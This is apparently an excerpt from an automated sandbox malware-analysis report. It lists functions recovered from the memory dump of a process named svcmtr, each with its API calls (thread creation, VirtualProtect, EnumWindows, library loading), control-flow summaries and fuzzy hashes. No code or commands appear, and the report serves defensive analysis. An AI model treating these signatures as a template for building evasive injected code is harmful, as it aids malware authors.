                                                                                                                            Function 002B1F30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 543 2b1f30-2b1f3b 544 2b1fe3-2b20ac call 2b12ba call 2b0f8f call 2b1564 call 2b20b8 543->544 545 2b1f41-2b1f49 543->545 583 2b20ae-2b20af 544->583 584 2b2113 544->584 545->544 546 2b1f4f-2b1f5f call 2b1f6a 545->546 555 2b1fca-2b1fd1 546->555 556 2b1f61 546->556 566 2b1fd6-2b1fe2 555->566 558 2b1fb3-2b1fc9 call 2b0c47 556->558 559 2b1f63 556->559 558->555 563 2b1f65-2b1fb2 call 2b0af8 * 2 559->563 564 2b1fd4-2b1fd5 559->564 563->558 564->566 566->544 585 2b2116-2b2119 583->585 586 2b20b1-2b2119 call 2b0af8 * 2 call 2b0c47 583->586 584->585 587 2b211d-2b21f1 CreateThread call 2b216c call 2b0af8 * 2 call 2b0c47 RtlExitUserThread 585->587 586->587
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: b38a031e012337fe839ce6ad3610a969e4d56cd4a2831f802b3cd8bcf287e05e
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: E551AC37A30712DAFB1D66A8CC66BFD6416E7E0790F6CE528A303D9583CEEC04649A00
                                                                                                                            Function 002B1F58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: 184454bfbc39e9516f5f357663f2b3abbb7dc38a37022d0070e82f34e3807ba7
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: 7C51AF76A34712DAFB1D62A8CC56BFD6416E7E0790F6CE53CA303D9583CEEC04649A00
                                                                                                                            Function 002B1F6A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 721ee91f7ced07ecd0f1f1bd4eb2a93d67aca6e4110dba8bda43447b324cff65
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 36518C76A34712DAFB1D62A8CC56BFD6416E7E0791F6CE53CA303E9183CDEC04549A10
                                                                                                                            Function 002B1FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction ID: 9b560223c7590e233132d685548e764a894fc660d0cd2808f29e8ed875519234
                                                                                                                            • Opcode Fuzzy Hash: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction Fuzzy Hash: B151BE36A30712DAEB1C66A8CC16BFD7512EBE0391F6CE52D9307E9183CEE804549A00
                                                                                                                            Function 002B1FDF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction ID: e65a4604579997c7440697626ec432a7b92daa7a69f71943525fda9ceeef85ca
                                                                                                                            • Opcode Fuzzy Hash: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction Fuzzy Hash: D941BD36A34712DAFB1C56A8CC46BFD7512EBE0791F2CE5299307E9183CDFC04589A00
                                                                                                                            Function 002B1FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction ID: b6a222111616aa0058fe97cb887136c99609642305d91d05ef017364a082d6c1
                                                                                                                            • Opcode Fuzzy Hash: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction Fuzzy Hash: DD41CC36A30722DAFB1C56B8CC06BFD7512EBE0780F28E528A307E91C3CDEC04588A10
                                                                                                                            Function 002B1052 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction ID: 2ea72e48c5a66371637854c46a526cd677ceb304dd3ec7d28afbb27d268b604a
                                                                                                                            • Opcode Fuzzy Hash: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction Fuzzy Hash: D4417B32E746528EEB0D9AA8CCB53FDB555EB80381FA8D53DCD03DA191CAF845B09A50
                                                                                                                            Function 002B203D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: f1a8bcbfc945f1c3d0a4a9050ffcb702e716656af2272f979d53ffe4608cb8ea
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: A4419B77A30722DAEB1C66ACCC56BFD6556E7E0780F2CE928A307D9183CCEC04588A10
                                                                                                                            Function 002B107D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 76382d261726efe3275ad30dde180d6d1543e13cb719baa5dc2a2bca57e203af
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 37417B32E74652CEEB0D9AA8CC753FDB255EB80381FA8D53DCE02DA191C9F845B0CA50
                                                                                                                            Function 002B2053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 06d17aa8f42daad1ffcaeff9c359ddf14f3b7385d0c54dedd8360f6ec7ef6324
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: A3318C77A30722DAEB1D52ACCC56BFD6556E7E0781F2CE5299307D9183CCEC04588550
                                                                                                                            Function 002B2061 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: 792dc15fecfdf7a4250b600d0e5e68986154374926a3812d69539d48a37fd853
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 91316B77A30722EAEB1D12ACCC56BFD6456EBE4790F6CE539A307D9183CDEC04584550
                                                                                                                            Function 002B172B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 298176923aa392e77f3eaba9f650cf5b5a73e9cc6e410cca160976b48bcc2425
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: 45314B33A301029BEB0C5B64CD656FDF795E794391FA8953DE002EB185DF7C4874A650
                                                                                                                            Function 002B08CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: 0ca65683ea9c4f8627c9373756310a4cf0f277a929aeafeced79b4c6928f7f14
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: 2F410A36E30326CBEF1A9AA8C8853FF7671FBC4741F28993DC202B5181CAB85954C691
                                                                                                                            Function 002B090D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: e1908d4a0f51807c36144ab618004d89b97efb8c1d09be2254f8c8695a0640c6
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: 8C319236D3132ACBDF1ACEA8C9882FFB671AB84741F2C863DC14676191CA741A54C6D2
                                                                                                                            Function 002B08BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: 160caf84465ea26aa8135c89923bab0cad1b8b8aace5e123fce68a34917cc519
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: BC31C235D3132ACBDF1ACEA8C9882FFB670BB85741F28863DC24276191CA741A54CAD1
                                                                                                                            Function 002B0938 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 8670d2b126125bea0159e3c9e35622c38c1909f485c04ddeefeab85306fb7132
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: F7217335D3132ACFDF1ACEA8C9882FFB671BB85741F298639C24576190CA741E54C6D1
                                                                                                                            Function 002B2091 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: f61aab90e9c0fcf4bedd2a53be83d69f498113e9223738d22cffaf4c3f812268
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 69314777A30B12E6EB1D226CCC56BFD544AE7E0780F6CE939A307D8183CCED04985550
                                                                                                                            Function 002B20B8 Relevance: 3.1, APIs: 2, Instructions: 106threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 1e5f980eb960f2dcae7b3cb8acc35be48251283bca6dedf489c09d4c967ef37e
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 6E21E27B634B12D5EB1D22ACCC66BFD540AE7E4780F68E93DA317D8183DCDD04985550
                                                                                                                            Function 002B20F7 Relevance: 3.1, APIs: 2, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: 110c1bde7ae142fc5b448dfce206d4d6e9dc42f926acd7f43674d49ab1a79e27
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: 03115976634B23E6EB1D22ACCC5A7FD5446E7E0780F6CE53D971B9C183DDD800A85460
                                                                                                                            Function 002B2122 Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: f19a2b4778d60d4aef2ef573b50b5739c682572f70ec77c4492e2a508942bd43
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: A911487A634B12E6EB1D22BCCC5ABFD5409E7E4780F68E539971B98083DCD800A85460
                                                                                                                            Function 002B216C Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: a11feffa91982e16be674acddaff8d79332b2af6fda60c9bcff9c1504e4272a6
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 13F0B8BB270A1294FB0C22A8CC66BB9440AE3E4781F6CE83E6213D8682DCDD80804020
                                                                                                                            Function 002B176A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: 48a5818cd35f281edb2cab1c9a7babf6a545f7f6d44286b80d2bca30f47f8bee
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: 12F0FC37A3510287EB0C9694DD651FDE291A7943927B8502DC00396281EFA805706550
                                                                                                                            Function 002B21AB Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction ID: b09fc23cec1915edcec8f93acbdc45ebbf39e27826bff133523f7bd1dceab43e
                                                                                                                            • Opcode Fuzzy Hash: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction Fuzzy Hash: 9EE0C272730B13D5DB2C32ACCC5B2FCA856EBD4381B6CD81A4547DC183DAE441809050
                                                                                                                            Function 002B21D6 Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction ID: 3ed3e6c30f26e33eccaaf401313b6df315f22554123ff42f8127755bf83500ae
                                                                                                                            • Opcode Fuzzy Hash: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction Fuzzy Hash: FAB092A2730A2244EE1C22B49C2B7E4804CA6E4756B58A8564593D8497E8D882804040
                                                                                                                            Function 002B1D50 Relevance: 1.4, APIs: 1, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
